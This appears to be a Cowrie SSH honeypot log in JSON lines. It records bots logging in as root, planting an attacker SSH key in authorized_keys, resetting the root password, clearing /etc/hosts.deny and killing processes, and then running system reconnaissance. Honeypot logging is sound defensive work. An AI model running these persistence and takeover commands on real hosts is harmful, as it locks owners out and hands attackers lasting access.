{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":43468,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb8611963532","protocol":"ssh","message":"New connection: 216.107.136.92:43468 (1.2.3.4:22) [session: eb8611963532]","sensor":"my-vps","timestamp":"2025-09-08T20:35:48.293266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:35:48.294133Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:35:48.384250Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.login.success","username":"root","password":"Test1234@","message":"login attempt [root/Test1234@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:35:48.794075Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:49.021552Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.022526Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.023613Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.114774Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:49.323242Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.323914Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.415925Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.416765Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":53232,"dst_ip":"1.2.3.4","dst_port":22,"session":"201bdf284269","protocol":"ssh","message":"New connection: 216.107.136.92:53232 (1.2.3.4:22) [session: 201bdf284269]","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.505080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.505760Z","src_ip":"216.107.136.92","session":"201bdf284269"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:35:49.604860Z","src_ip":"216.107.136.92","session":"201bdf284269"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:35:50.006875Z","src_ip":"216.107.136.92","session":"201bdf284269"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:51.099290Z","src_ip":"216.107.136.92","session":"201bdf284269"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:57.249332Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:35:57.250225Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:57.341972Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:57.591139Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"echo \"root:MD1yueywtam6\"|chpasswd|bash","message":"CMD: echo \"root:MD1yueywtam6\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T20:35:57.592047Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5b968fe10166d783c3c5ca96f93dfc49bd472fe971bf681e9c1dcbb0f83cdba8","size":21,"shasum":"5b968fe10166d783c3c5ca96f93dfc49bd472fe971bf681e9c1dcbb0f83cdba8","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/5b968fe10166d783c3c5ca96f93dfc49bd472fe971bf681e9c1dcbb0f83cdba8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:57.683815Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:57.925797Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T20:35:57.926605Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.020542Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.021634Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:58.320288Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.321163Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.413778Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:58.615547Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.616366Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.708403Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:58.987999Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.988675Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T20:35:58.989266Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.081737Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:59.313183Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.313828Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.405190Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:59.603974Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.604783Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.696505Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:35:59.968525Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T20:35:59.969213Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.061312Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:00.258976Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.259778Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.351937Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:00.623270Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.624047Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.716811Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:00.960217Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T20:36:00.961326Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.053027Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:01.255666Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.256470Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.348789Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:01.644781Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.645956Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.738434Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:01.991407Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T20:36:01.992167Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:02.084026Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:36:02.283835Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T20:36:02.284567Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:02.376729Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.closed","duration":"14.1","message":"Connection lost after 14.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:36:02.378121Z","src_ip":"216.107.136.92","session":"eb8611963532"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56126,"dst_ip":"1.2.3.4","dst_port":22,"session":"e19ad6abc8c0","protocol":"ssh","message":"New connection: 217.72.205.35:56126 (1.2.3.4:22) [session: e19ad6abc8c0]","sensor":"my-vps","timestamp":"2025-09-08T20:37:31.654000Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:37:31.655154Z","src_ip":"217.72.205.35","session":"e19ad6abc8c0"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":53258,"dst_ip":"1.2.3.4","dst_port":22,"session":"a107ef53711b","protocol":"ssh","message":"New connection: 216.107.136.92:53258 (1.2.3.4:22) [session: a107ef53711b]","sensor":"my-vps","timestamp":"2025-09-08T20:37:34.238786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:37:34.239772Z","src_ip":"216.107.136.92","session":"a107ef53711b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH 